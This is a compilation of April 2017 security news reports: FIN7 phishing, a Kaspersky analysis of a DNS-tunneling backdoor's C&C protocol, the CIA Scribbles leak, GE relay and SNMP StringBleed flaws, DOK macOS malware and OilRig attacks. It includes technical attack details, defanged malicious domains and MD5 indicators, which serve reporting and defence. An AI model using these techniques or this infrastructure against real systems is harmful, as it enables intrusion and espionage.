In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.
In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.
A few days ago, Vickery’s disclosed a massive data breach at a U.S.-based data warehouse, Schoolzilla, which held personal information on more than a million American students (K-12).
FIN7 group has enhanced its phishing techniques
29.4.2017 securityaffairs Phishing
According to the experts from security firm FireEye, the financially-motivated FIN7 group is changing hacking techniques.
The group that has been active since late 2015, and was recently spotted to have been targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.
The FIN7 group has adopted new phishing techniques, it is leveraging on hidden shortcut files (LNK files) to compromise targets.
Experts from FireEye highlighted that attacks were launched by FIN7 group and not the Carbanak Group as suspected by other security experts.
“FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7.” reads the analysis published by FireEye. “FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.”
Experts from FireEye distinguish the activity associated with the FIN7 group to the one attributed to CARBANAK.
Security experts discovered a string of fileless malware attacks last month that have been powered by the same hacking framework.
The last attacks attributed to FIN7 recently spotted did not use weaponized Microsoft Office, hackers switched to hidden shortcut files (LNK files) as an attack vector to launch “mshta.exe”. Then FIN7 hackers used the VBScript functionality launched by mshta.exe to compromise the victim’s system.
“In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.” reads the analysis.
Hackers leveraged on spear phishing emails using malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique.
The DOCX and RTF files attempt to convince the user to double-click included images.
“both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document” states the analysis.
“In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique.”
The ongoing campaign targeted large restaurant chains, hospitality, and financial service organizations, threat actors used phishing messages themed as complaints, catering orders, or resumes. To improve the efficiency of the campaign the FIN7 hackers were also calling the targets to make sure they received the email.
According to the experts, this new phishing scheme is more effective respect previous ones.
“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” state the researchers.
Hackers used a multilayer obfuscated PowerShell script that once launched executes shellcode for a Cobalt Strike stager. The shellcode downloads an additional payload from a specific C&C server using DNS aaa.stage.14919005.www1.proslr3[.]com, if the reply is successful, the PowerShell executes the embedded Cobalt Strike.
The FIN7 group also used the HALFBAKED backdoor in the ongoing attacks.
FireEye researchers examined shortcut LNK files created by attackers that allowed them to reveal valuable information attackers environment.
One of the LNK files used by hackers in the last campaign revealed some specific information about the attackers, for example, that the hackers likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
Use of DNS Tunneling for C&C Communications
29.4.2017 Kaspersky Virus
– You are goddamn right.
Network communication is a key function for any malicious program. Yes, there are exceptions, such as cryptors and ransomware Trojans that can do their job just fine without using the Internet. However, they also require their victims to establish contact with the threat actor so they can send the ransom and recover their encrypted data. If we omit these two and have a look at the types of malware that have no communication with a C&C and/or threat actor, all that remains are a few outdated or extinct families of malware (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that usually does nothing more than scare the user with screamers or switches mouse buttons.
Malware has come a long way since the Morris worm, and the authors never stop looking for new ways to maintain communication with their creations. Some create complex, multi-tier authentication and management protocols that can take weeks or even months for analysists to decipher. Others go back to the basics and use IRC servers as a management host – as we saw in the recent case of Mirai and its numerous clones.
Often, virus writers don’t even bother to run encryption or mask their communications: instructions and related information is sent in plain text, which comes in handy for a researcher analyzing the bot. This approach is typical of incompetent cybercriminals or even experienced programmers who don’t have much experience developing malware.
However, you do get the occasional off-the-wall approaches that don’t fall into either of the above categories. Take, for instance, the case of a Trojan that Kaspersky Lab researchers discovered in mid-March and which establishes a DNS tunnel for communication with the C&C server.
The malicious program in question is detected by Kaspersky Lab products as Backdoor.Win32.Denis. This Trojan enables an intruder to manipulate the file system, run arbitrary commands and run loadable modules.
Encryption
Just like lots of other Trojans before it, Backdoor.Win32.Denis extracts the addresses of the functions it needs to operate from loaded DLLs. However, instead of calculating the checksums of the names in the export table (which is what normally happens), this Trojan simply compares the names of the API calls against a list. The list of API names is encrypted by subtracting 128 from each symbol of the function name.
It should be noted that the bot uses two versions of encryption: for API call names and the strings required for it to operate, it does the subtraction from every byte; for DLLs, it subtracts from every other byte. To load DLLs using their names, LoadLibraryW is used, meaning wide strings are required.
‘Decrypting’ strings in the Trojan
Names of API functions and libraries in encrypted format
It should also be noted that only some of the functions are decrypted like this. In the body of the Trojan, references to extracted functions alternate with references to functions received from the loader.
C&C Communication
The principle behind a DNS tunnel’s operation can be summed up as: “If you don’t know, ask somebody else”. When a DNS server receives a DNS request with an address to be resolved, the server starts looking for it in its database. If the record isn’t found, the server sends a request to the domain stated in the database.
Let’s see how this works when a request arrives with the URL Y3VyaW9zaXR5.example.com to be resolved. The DNS server receives this request and first attempts to find the domain extension ‘.com’, then ‘example.com’, but then it fails to find ‘Y3VyaW9zaXR5.example.com’ in its database. It then forwards the request to example.com and asks it if such a name is known to it. In response, example.com is expected to return the appropriate IP; however, it can return an arbitrary string, including C&C instructions.
Dump of Backdoor.Win32.Denis traffic
This is what Backdoor.Win32.Denis does. The DNS request is sent first to 8.8.8.8, then forwarded to z.teriava[.]com. Everything that comes before this address is the text of the request sent to the C&C.
Here is the response:
DNS packet received in response to the first request
Obviously, the request sent to the C&C is encrypted with Base64. The original request is a sequence of zeros and the result of GetTickCount at the end. The bot subsequently receives its unique ID and uses it for identification at the start of the packet.
The instruction number is sent in the fifth DWORD, if we count from the start of the section highlighted green in the diagram above. Next comes the size of the data received from C&C. The data, packed using zlib, begins immediately after that.
The unpacked C&C response
The first four bytes are the data size. All that comes next is the data, which may vary depending on the type of instruction. In this case, it’s the unique ID of the bot, as mentioned earlier. We should point out that the data in the packet is in big-endian format.
The bot ID (highlighted) is stated at the beginning of each request sent to the C&C
C&C Instructions
Altogether, there are 16 instructions the Trojan can handle, although the number of the last instruction is 20. Most of the instructions concern interaction with the file system of the attacked computer. Also, there are capabilities to gain info about open windows, call an arbitrary API or obtain brief info about the system. Let us look into the last of these in more detail, as this instruction is executed first.
Complete list of C&C instructions
Information about the infected computer, sent to the C&C
As can be seen in the screenshot above, the bot sends the computer name and the user name to the C&C, as well as the info stored in the registry branch Software\INSUFFICIENT\INSUFFICIENT.INI:
Time when that specific instruction was last executed. (If executed for the first time, ‘GetSystemTimeAsFileTime’ is returned, and the variable BounceTime is set, in which the result is written);
UsageCount from the same registry branch.
Information about the operating system and the environment is also sent. This info is obtained with the help of NetWkstaGetInfo.
The data is packed using zlib.
The DNS response prior to Base64 encryption
The fields in the response are as follows (only the section highlighted in red with data and size varies depending on the instruction):
Bot ID;
Size of the previous C&C response;
The third DWORD in the C&C response;
Always equals 1 for a response;
GetTickCount();
Size of data after the specified field;
Size of response;
Actual response.
After the registration stage is complete, the Trojan begins to query the C&C in an infinite loop. When no instructions are sent, the communication looks like a series of empty queries and responses.
Sequence of empty queries sent to the C&C
Conclusion
The use of a DNS tunneling for communication, as used by Backdoor.Win32.Denis, is a very rare occurrence, albeit not unique. A similar technique was previously used in some POS Trojans and in some APTs (e.g. Backdoor.Win32.Gulpix in the PlugX family). However, this use of the DNS protocol is new on PCs. We presume this method is likely to become increasingly popular with malware writers. We’ll keep an eye on how this method is implemented in malicious programs in future.
MD5
facec411b6d6aa23ff80d1366633ea7a
018433e8e815d9d2065e57b759202edc
1a4d58e281103fea2a4ccbfab93f74d2
5394b09cf2a0b3d1caaecc46c0e502e3
5421781c2c05e64ef20be54e2ee32e37
Wikileaks revealed the Scribbles tool used by the CIA to mark documents and track whistleblowers
29.4.2017 securityaffairs BigBrothers
Wikileaks has published a new piece of the Vault 7 leak that details a CIA project codenamed Scribbles (a.k.a. the “Snowden Stopper”).
Scribbles is a software allegedly developed to embed ‘web beacon’ tags into confidential documents aiming to track whistleblowers and foreign spies.
Wikileaks has leaked the Scribbles documentation and its source code, the latest released version of Scribbles (v1.0 RC1) is dated March 1, 2016, the date suggests it was used until at least last year.
According to documents leaked by Wikileaks, Scribbles is “a document-watermarking preprocessing system to embed “Web beacon”-style tags into documents that are likely to be copied by Insiders, Whistleblowers, Journalists or others.”
The Scribbles software was written in C# programming language and generate a random watermark that is inserted in each document.
“(S//OC/NF) Scribbles (SCRIB) is a document watermarking tool that can be used to batch process a number of documents in a pre-seeded input directory. It generates a random watermark for each document, inserts that watermark into the document, saves all such processed documents in an output directory, and creates a log file which identifies the watermarks inserted into each document.” reads the Scribbles user guide.
Every time the watermarked document is accessed by anyone it will load an embedded file in the background and creates an entry on the CIA’s tracking server. The record related to an access of a document contains the information about who accessed it, the time stamp and its IP address. In this way, it is possible to track document accesses and any abuses.
Unfortunately for the CIA agents, the Scribbles software only works with Microsoft Office. According to the user manual, the CIA tool was developed for off-line preprocessing of Microsoft Office documents, this means that if the watermarked documents are opened in any other application like OpenOffice or LibreOffice, they may reveal watermarks and URLs to the user.
According to the leaked documents, “the Scribbles document watermarking tool has been successfully tested on…Microsoft Office 2013 (on Windows 8.1 x64), documents from Office versions 97–2016 (Office 95 documents will not work!) [and]…documents that are not be locked forms, encrypted, or password-protected.”
Another limitation of the software is that watermarks are loaded from a remote server, so the tool should work only when the user accessing the marked documents is connected to the Internet.
This is the last batch of files released by Wikileaks, in order of time the organization leaked:
The Year Zero that revealed CIA hacking exploits for hardware and software.
The Dark Matter dump containing iPhone and Mac hacking exploits.he “
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
Severe vulnerability in GE Multilin SR poses a serious threat to Power Grid
28.4.2017 securityaffairs Vulnerebility
Security experts discovered a critical vulnerability in GE Multilin SR that poses a serious threat to the power grid worldwide.
A team of researchers from New York University has found a serious vulnerability in some of GE Multilin SR protection relays that poses a serious threat to power grid.
The experts will provide further details about the vulnerability at the upcoming Black Hat conference in Las Vegas, below an excerpt from the abstract published on the conference website.
“Essentially, we completely broke the homebrew encryption algorithm used by these protection and management devices to authenticate users and allow privileged operations,” explained the experts in their abstract. “Knowledge of the passcode enables an attacker to completely pwn the device and disconnect sectors of the power grid at will, locking operators out to prolong the attack.”
The experts will propose also a live demo showcasing exploitation of the vulnerability during their talk anticipating that an attack leveraging on the issue would have a significant impact on a nation.
The ICS-CERT published a security advisory on this threat that was tracked as CVE-2017-7095.
An attacker can obtain the password either from the front LCD panel or via Modbus commands and use it to gain unauthorized access to vulnerable products.
“Successful exploitation of this vulnerability may allow a remote attacker to obtain weakly encrypted user passwords, which could be used to gain unauthorized access to affected products.” reads the advisory.
“Cipher text versions of user passwords were created with a non-random initialization vector leaving them susceptible to dictionary attacks. Cipher text of user passwords can be obtained from the front LCD panel of affected products and through issued Modbus commands.”
The following versions of GE Multilin SR relays are affected by the flaw:
750 Feeder Protection Relay, firmware versions prior to Version 7.47,
760 Feeder Protection Relay, firmware versions prior to Version 7.47,
469 Motor Protection Relay, firmware versions prior to Version 5.23,
489 Generator Protection Relay, firmware versions prior to Version 4.06,
745 Transformer Protection Relay, firmware versions prior to Version 5.23, and
369 Motor Protection Relay, all firmware versions.
GE has promptly released firmware updates that fix the vulnerability for most of the above products. The firmware updates for 369 Motor Protection Relays are expected to be released in June.
To mitigate the vulnerability GE recommends that users apply updated firmware versions to affected products, as well as implement the following best practices:
Control access to affected products by keeping devices in a locked and secure environment,
Remove passwords when decommissioning devices,
Monitor and block malicious network activity, and
Implement appropriate network segmentation and place affected devices within the control system network, behind properly configured firewalls. Protection and Control system devices should not be directly connected to the Internet or business networks.
While the recent disruptions to Ukraine’s energy supply have clearly demonstrated that attacks on the power grid are a reality, it’s not uncommon for cybersecurity researchers to exaggerate the impact of their findings. It remains to be seen exactly how easily this flaw can be exploited after more information is made available.
Critical Flaw in GE Protection Relays Exposes Power Grid: Researchers
28.4.2017 securityaffairs Vulnerebility
A critical vulnerability that affects some of GE’s protection relays poses a serious threat to the power grid, researchers have claimed. The vendor has started releasing patches for the security hole.
A team of researchers from New York University said they identified a severe flaw in some of GE’s Multilin SR protection relays, which are widely deployed in the energy sector. The experts will detail and demonstrate an exploit at the upcoming Black Hat conference in Las Vegas, but they have shared some information on their findings.
“Essentially, we completely broke the home brew encryption algorithm used by these protection and management devices to authenticate users and allow privileged operations,” the experts wrote in their abstract for the conference. “Knowledge of the passcode enables an attacker to completely pwn the device and disconnect sectors of the power grid at will, locking operators out to prolong the attack.”
In an advisory published on Thursday, ICS-CERT said the remotely exploitable vulnerability, tracked as CVE-2017-7095, is related to the use of non-random initialization vectors when encrypting passwords, which exposes them to dictionary attacks.
An attacker who can obtain the password — either from the front LCD panel or via Modbus commands — can hijack the affected device.
ICS-CERT reported that the flaw affects the 750 and 760 Feeder Protection Systems, 369 and 469 Motor Protection Relays, 745 Transformer Protection Relays, and 489 Generator Protection Relays.
GE has already released firmware updates that address the vulnerability for most of these devices, except for 369 Motor Protection Relays, for which patches are expected to become available in June.
The vendor has also advised users to follow physical and network security best practices to prevent exploitation of the flaw, including keeping the devices in a secure environment, removing passwords for decommissioned devices, implementing network segmentation, and monitoring the network for malicious activity.
GE has released an advisory, but it’s only available to customers. The company told SecurityWeek that the affected products are “a limited family of legacy GE products that were developed in the 1990s before current industry expectations for security.” GE said it was not aware of any incidents where the security hole had been exploited.
While the recent disruptions to Ukraine’s energy supply have clearly demonstrated that attacks on the power grid are a reality, it’s not uncommon for cybersecurity researchers to exaggerate the impact of their findings. It remains to be seen exactly how easily this flaw can be exploited after more information is made available.
StringBleed SNMP Authentication Bypass affects numerous devices online
28.4.2017 securityaffairs Vulnerebility
Security researchers discovered an SNMP flaw dubbed StringBleed that affects several models of Internet-connected devices.
Simple Network Management Protocol (SNMP) authentication bypass affects several IoT devices, hackers could exploit the issue by simply sending random values in specific requests.
The problem, dubbed StringBleed and tracked as CVE 2017-5135, was reported by the security researchers Ezequiel Fernandez and Bertin Bervis.
The SNMP protocol supports three methods for client authentication and to authenticate requests on remote SNMP devices, two of them are affected by the authentication bypass issue.
The StringBleed issue resides in the way SNMP agent in running on differed IoT devices handles a human-readable string datatype value called “community string” that SNMP version 1 and 2 use.
“we know there are 3 ways to authenticate the client and requests in the remote SNMP device, SNMP version 1 & 2 use a human-readable string datatype value called “community string” (usually public or private) in SNMP version 3 you have the option to use a user, password and authentication methods. ” explained the researchers.
The researchers used a simple python script to build a “snmpget” request that used the sysDescr OID, then they started scanning the Internet for devices that would respond to the request. The experts were searching for sysDescr OID information provided by the devices in response to requests using test strings like ‘admin’, ‘root’, and ‘user.’
The researchers were looking to retrieve the sysDescr OID information successfully when the test string value (‘admin’, ‘root’, ‘user, etc.) was the same as the one stored in the SNMP agent for authentication.
“We wrote a simple python script from scratch using sockets in order to build the “snmpget” request, in the request we used the sysDescr OID , if the string value we are testing (admin,root etc etc) is the same stored in the SNMP agent for authentication , we are going to retrieve the sysDescr OID information successfully, is like a kind of “brute force”. After some days of scanning we noticed something weird, some devices/fingerprints were always responding no matter which value we used, so what’s going here??? researchers added.
As I mentioned before, the SNMP version 1 & 2 authentication should only accept the value stored in the SNMP agent authentication mechanism, but the behavior based in our results is not accurate like the statement explained previously.”
The StringBleed vulnerability is an Incorrect Access Control issue, remote attackers could exploit the issue to execute code on the vulnerable devices and gain “full read/write remote permissions using any string/integer value.”
“In few words, we discovered the following: you can use any value string or integer in order to authenticate the SNMP agent successfully in some specific devices, but the worse thing here is : you have full read/write remote permissions using any string/integer value.” said the researchers.
The results of the Internet Scan were disconcerting, an attacker could use any value string or integer to authenticate the SNMP agent on the flawed devices.
The experts discovered the but by testing the attack on the CISCO DPC3928SL wireless residential gateway, which is now owned by Technicolor.
The company confirmed the presence of the StringBleed bug on the device but clarified that it was only a “control misconfiguration issue” and that it was isolated to a single Internet Service Provider (ISP).
According to the experts, the issue is widespread and hackers could easily target exposed on the Internet.
One of the researchers revealed in a discussion on Reddit that 78 vulnerable models were found vulnerable to date to the StringBleed flaw.
Stay Tuned …. the number of models could rapidly increase.
New MacOS Malware, Signed With Legit Apple ID, Found Spying On HTTPS Traffic
28.4.2017 thehackernews Apple
Many people believe that they are much less likely to be bothered by malware if they use a Mac computer, but is it really true? Unfortunately, No.
According to the McAfee Labs, malware attacks on Apple's Mac computers were up 744% in 2016, and its researchers have discovered nearly 460,000 Mac malware samples, which is still just a small part of overall Mac malware out in the wild.
Today, Malware Research team at CheckPoint have discovered a new piece of fully-undetectable Mac malware, which according to them, affects all versions of Mac OS X, has zero detections on VirusTotal and is "signed with a valid developer certificate (authenticated by Apple)."
Dubbed DOK, the malware is being distributed via a coordinated email phishing campaign and, according to the researchers, is the first major scale malware to target macOS users.
The malware has been designed to gain administrative privileges and install a new root certificate on the target system, which allows attackers to intercept and gain complete access to all victim communication, including SSL encrypted traffic.
Just almost three months ago, Malwarebytes researchers also discovered a rare piece of Mac-based espionage malware, dubbed Fruitfly, that was used to spy on biomedical research center computers and remained undetected for years.
Here's How the DOK Malware Works:
The malware is distributed via a phishing email masquerading as a message regarding supposed inconsistencies in their tax returns, tricking the victims into running an attached malicious .zip file, which contains the malware.
Since the malware author is using a valid developer certificate signed by Apple, the malware easily bypasses Gatekeeper -- an inbuilt security feature of the macOS operating system by Apple. Interestingly, the DOK malware is also undetectable in almost all antivirus products.
Once installed, the malware copies itself to the /Users/Shared/ folder and then add to "loginItem" in order to make itself persistent, allowing it to execute automatically every time the system reboots, until it finishes to install its payload.
The malware then creates a window on top of all other windows, displaying a message claiming that a security issue has been identified in the operating system and an update is available, for which the user has to enter his/her password.
Once the victim installed the update, the malware gains administrator privileges on the victim's machine and changes the victim system's network settings, allowing all outgoing connections to pass through a proxy.
According to CheckPoint researchers, "using those privileges, the malware will then install brew, a package manager for OS X, which will be used to install additional tools – TOR and SOCAT."
DOK Deletes itself after Setting up Attacker's Proxy
The malware then installs a new root certificate in the infected Mac, which allows the attacker to intercept the victim’s traffic using a man-in-the-middle (MiTM) attack.
"As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings," the researchers say.
"The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim's traffic and tamper with it in any way they please."
According to researchers, almost no antivirus has updated its signature database to detect the DOK OS X malware, as the malware deletes itself once it modifies proxy settings on the target machines for interceptions.
Apple can resolve this issue just by revoking the developer certificate being abused by the malware author.
Meanwhile, users are always recommended to avoid clicking links contained in messages or emails from untrusted sources and always pay extra attention before proving your root password.
Kali Linux 2017.1 is arrived, more power for password-cracking with cloud GPUs
28.4.2017 securityaffairs Safety
Kali Linux 2017.1 rolling release was announced, the popular distro comes with a set of significant updates and features.
The popular Kali Linux distribution has a new weapon in its hacking arsenal, it can use cloud GPUs for password cracking.
Kali Linux is the most popular distribution in the hacking community, it is a Debian-based distro that includes numerous hacking and forensics tools.
Kali linux
This week, the Kali development team has included new images optimized for GPU-using instances in Azure and Amazon Web Services. The images will improve the password cracking abilities of the Kali Linux distro giving it more power for brute-force attacks exploiting the GPUs computational power.
“Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts into streamlining Kali’s approach. We noticed that Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. You can check out our Cracking in the Cloud with CUDA GPUs post we released a few weeks back for more information.” states the official announcement.
Now is you want to test your password against brute-force attacks you can download the GPU-enhanced images and run in cloud services, the bad news is that this means that also black hats have a new powerful weapon in their hands.
The new Kali Linux, version 2017.1, also adds support for Realtek’s RTL8812AU wireless chipsets, it is a very useful feature because these chipsets are used by major modem-makers like Belkin, D-Link, and TP-Link.
“A while back, we received a feature request asking for the inclusion of drivers for RTL8812AU wireless chipsets. These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11 AC, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favorite.” continues the announcement.
The driver can be installed using the following commands:
apt-get update
apt install realtek-rtl88xxau-dkms
Reading the Kali Linux Bug Tracker List we can notice the new support for the OpenVAS 9 vulnerability scanner.
Enjoy it!
The massive attack against Israel was alleged launched by the Iranian OilRig APT group
28.4.2017 securityaffairs APT
According to the experts at the security firm Morphisec that massive attack against Israeli targets was powered by the OilRig APT group.
Yesterday the Israeli Cyber Defense Authority announced it has thwarted a major cyberattack against 120 targets just days after harsh criticism of new cyber defense bill.
In a first time, the authorities blamed a foreign state for the massive cyber espionage campaign against major Israeli institutions and government officials, now the Authority blames Iranian state-sponsored hackers for the cyber attack.
The Israeli experts believe that attack was launched by the OilRig APT group (aka Helix Kitten, NewsBeef ), an Iran-linked APT that has been around since at least 2015.
According to the Israeli Cyber Defense Authority, hackers targeted against some 250 individuals between April 19 and 24 in various sectors, including government agencies, high-tech companies, medical organizations, and educational institutions. including the renowned Ben-Gurion University.
Hackers also targeted experts at the prestigious Ben-Gurion University, where researchers conduct advanced researchers. The threat actors leveraged stolen email accounts from Ben-Gurion to deliver malware to victims.
“From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations. Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details. Initial reports of the attacks, published April 26 (in Hebrew) by the Israel National Cyber Event Readiness Team (CERT-IL) and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel. Ironically, Ben-Gurion University is home to Israel’s Cyber Security Research Center.” reads the analysis shared by Morphisec. “Investigators put the origin of the attack as Iranian; Morphisec’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns.“
Hackers used weaponized Word documents triggering the recently-patched Microsoft RCE vulnerability, tracked as CVE-2017-0199.
The exploitation of this specific flaw demonstrates the technical evolution of the OilRig APT group. The attack doesn’t request user’s interaction like macro-enable attacks, the weaponized document contains an exploit via an embedded link packed with an HTML executable.
“The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, CVE-2017-0199, by actually reusing an existing PoC that have been published immediately after the patch release. Microsoft released the patch for the vulnerability on April 11 but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.” continues the analysis.
Experts at Morphisec discovered that hackers used a customized version of the open-source Mimikatz tool to gain access to user credentials in the Windows Local Security Authority Subsystem Service.
“Morphisec identified few more samples of communication with different other C&C servers (“alenupdate[.]info” and “maralen[.]tk”) in which a more advanced customized version of Mimikatz has been sent to specific users and additional agent have been installed in “C:\Program Files (x86)\Microsoft Idle\” directory:” states Morphisec.
Early this year the OilRig APT was involved in a string of cyber attacks targeted several Israeli organizations, including IT vendors, the national postal service, and financial institutions.
Security experts from ClearSky discovered that the Iranian hackers set up a fake Juniper Networks VPN portal and used compromised email accounts from IT vendors to lure victims to it. According to ClearSky, OilRig APT leveraged digitally signed malware and fake University of Oxford domains in its campaign.
SNMP Authentication Bypass Plagues Numerous Devices
28.4.2017 securityweek Vulnerebility
The Simple Network Management Protocol (SNMP) embedded in some Internet connected devices allows an attacker to bypass authentication by simply sending random values in specific requests, security researchers have discovered.
SNMP is a popular protocol for network management that features support for three ways to authenticate the client and requests on remote SNMP devices. The first two of these are vulnerable to an authentication bypass if random values are sent in requests, security researchers Ezequiel Fernandez (Argentina) and Bertin Bervis (Costa Rica) argue.
The issue, the researchers say, resides in the manner in which the SNMP agent in different devices (usually cable modems) handles a human-readable string datatype value called “community string” that SNMP version 1 and 2 use.
Called StringBleed and tracked as CVE 2017-5135, the vulnerability is referred to as Incorrect Access Control and could allow an attacker to execute code remotely on the vulnerable device. Successful exploitation would provide them with “full read/write remote permissions using any string/integer value,” the researchers argue.
With the help of a python script meant to build a “snmpget” request that used the sysDescr OID, the researchers started searching the Internet for devices that would respond to the request. The researchers were looking to retrieve the sysDescr OID information successfully when the test string value (admin, root, user, etc) was the same as the one stored in the SNMP agent for authentication.
The script was supposedly going to work as a type of brute force, the researchers say, but the results were surprising, as some of the discovered devices would respond to the request regardless of the used value.
“SNMP version 1 and 2 authentication should only accept the value stored in the SNMP agent authentication mechanism,” the researchers note. However, their testing revealed that an attacker could use any value string or integer to authenticate the SNMP agent successfully on specific device types.
The bug was initially discovered on the CISCO DPC3928SL wireless residential gateway, which is now owned by Technicolor, and which confirmed the bug, but said it was only a “control misconfiguration issue” and that it was isolated to a single Internet Service Provider (ISP).
The researchers, however, claim that the manufacturer is at fault and that the issue is more widespread. According to them, attackers could easily execute code or leak passwords and other sensitive information from vulnerable devices pertaining to several vendors.
In a post on Reddit, one of the researchers revealed that 78 vulnerable models were found to date, and also said that continuous scans might reveal more of them.
FIN7 Hackers Change Phishing Techniques
28.4.2017 securityweek Phishing
A recently uncovered threat group referred to as FIN7 has adopted new phishing techniques and is now using hidden shortcut files (LNK files) to compromise targets, FireEye security researchers reveal.
The financially-motivated threat group has been active since late 2015 and was recently found to have been targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.
While some security firms refer to the operation as the “Carbanak Group,” FireEye says that not all CARBANAK backdoor activity can be attributed to FIN7. Interestingly, the group’s recent fileless attacks were said last month to have been launched from an attack framework used in various other seemingly unrelated attacks as well.
In the recently observed campaign, FIN7 was no longer using malicious Microsoft Office macros to evade detection, but switched to hidden shortcut files (LNK files) as the initial infection vector, while using the VBScript functionality launched by mshta.exe to infect the victim, FireEye reveals.
The campaign featured spear phishing emails that contained malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique. The group targeted various locations of large restaurant chains, hospitality, and financial service organizations with emails themed as complaints, catering orders, or resumes. On top of that, the group was also calling the targets to make sure they received the email.
The DOCX and RTF files attempt to convince the user to double-click included images. When that happens, the hidden embedded malicious LNK file in the document launches “mshta.exe” with a specific argument. The script in the argument combines all text box contents in the document, executes them, and creates a scheduled task for persistence.
“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” the researchers note.
A multilayer obfuscated PowerShell script is dropped and launched, which in turn executes shellcode for a Cobalt Strike stager. The shellcode retrieves an additional payload by connecting to a specific command and control (C&C) server using DNS, the researchers discovered. If a successful reply is received from the C&C, the PowerShell executes the embedded Cobalt Strike.
The campaign was also observed using a HALFBAKED backdoor variant, capable of performing various operations based on commands received from the server: send victim machine information (OS, Processor, BIOS and running processes) using WMI queries; take screenshots of victim machine; execute a VB script, EXE file, or PowerShell script; and delete or update a specified file.
One of the LNK files used by FIN7 in this campaign revealed some specific information about the attackers, namely that the shortcut launched within the string data, and that the actor likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017, the researchers note.
State-Affiliated Hackers Responsible for Nearly 1 in 5 External Data Breaches: Verizon DBIR
27.4.2017 securityweek Incindent
The Verizon Data Breach Investigations Report (DBIR) is industry's go-to analysis of security incidents and successful breaches over the previous year. The latest report was published Thursday.
The 2017 DBIR (PDF) marks the report's 10-year anniversary. Over the last decade, it has grown from an analysis of Verizon's own breach data knowledgebase to now include breach data from 65 different organizations. The latest report includes analyses of 42,068 incidents and 1,935 breaches from 84 countries.
Highlights show that the insider threat remains fairly constant as the cause of 25% of breaches, but with 75% being perpetrated by outsiders. The externally-caused breaches, according to Verizon, comprise 51% involving organized crime groups, 18% from state-affiliated actors, 3% comprising multiple parties, and 2% involving partners.
DBIR 2017 from VerizonSixty-two percent of all breaches involved hacking; and 81% of those leveraged either stolen and/or weak passwords. The clear implication is that both organizations and individuals are still, or at least in 2016, were still not exercising adequate password hygiene; that is, strong and regularly changed passwords.
Verizon's figures show that the finance sector is the most frequently breached vertical. Twenty-four percent of breaches affected financial organizations. This was followed by healthcare at 15%; retail and accommodation combined at 15%; and public entities at 12%.
Other key statistics highlighted by Verizon include most of malware is installed via malicious email (66%); an even higher percentage (73%) of breaches are financially motivated; and that 21% were related to cyberespionage.
Verizon hopes that these statistics on recent breaches can help practitioners better protect their organizations today.
"Insights provided in the DBIR are leveling the cybersecurity playing field," said George Fischer, president of Verizon Enterprise Solutions. "Our data is giving governments and organizations the information they need to anticipate cyberattacks and more effectively mitigate cyber-risk. By analyzing data from our own security team and that of other leading security practitioners from around the world, we're able to offer valuable intelligence that can be used to transform an organization's risk profile."
This intent is further aided by a breakdown of methods used to attack the different vertical sectors. For example, the report notes that the accommodation and food services sector "was dominated by POS breaches. Most of them are opportunistic and financially motivated and involve primarily malware and hacking threat actions. Time-to-compromise is quick but time-to-discovery and containment remains in the months category."
One frequently highlighted attack vector is the web application attack, noted particularly in the financial and insurance; information; and retail sectors. "Attackers are always looking for the weakest link in your IT infrastructure, before leveraging expensive 0-days and complicated APT attacks," explains Ilia Kolochenko, CEO of High-Tech Bridge. "Today, the majority of large organizations and governments can be easily breached via their web and mobile (backend) applications."
